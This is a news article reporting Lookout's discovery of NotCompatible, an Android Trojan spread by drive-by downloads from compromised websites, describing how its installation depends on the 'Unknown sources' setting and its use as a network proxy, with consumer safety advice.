Android has been a target for malware creators for a while. Usually, cyberscum try to get their evil code onto your smartphone through apps masquerading as something else. They may show up briefly in the Android Market (now known as Google Play) only to be yanked once they are discovered.

But now, for the first time, researchers have spotted in the wild Android malware that leaps onto a device on its own via a compromised website. Lookout, which makes smartphone security software, says it’s the first Android Trojan that’s delivered by a so-called drive-by download of a site hosting poisoned code. The malware has been given the name NotCompatible.

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application. This process is commonly referred to as a drive-by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, the installation will be blocked.

Georgiabiker, a poster at Reddit, grabbeda screenshot of the notification that appears once the malware has been downloaded and before it’s installed. Fortunately, you do have a warning and, if you’re smart, you won’t tap the Install button.

What exactly does the software do if you allow its installation? Lookout says it serves as a “relay/proxy” and doesn’t necessarily hurt your device. But it could be used to access private networks:

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Exactly how many sites have been compromised with the NotCompatible installation code is unclear. The Lookout blog mentions a couple of obscure ones, and has posted the code so site administrators can check for it on their servers. It has also identified at least one of the Trojan’s command-and-control domains.

Smart Android owners should not allow the installation of any software they weren’t expecting. And it may not be a bad idea to install an antimalware app on your Android device. This may be a first, but it certainly won’t be the last.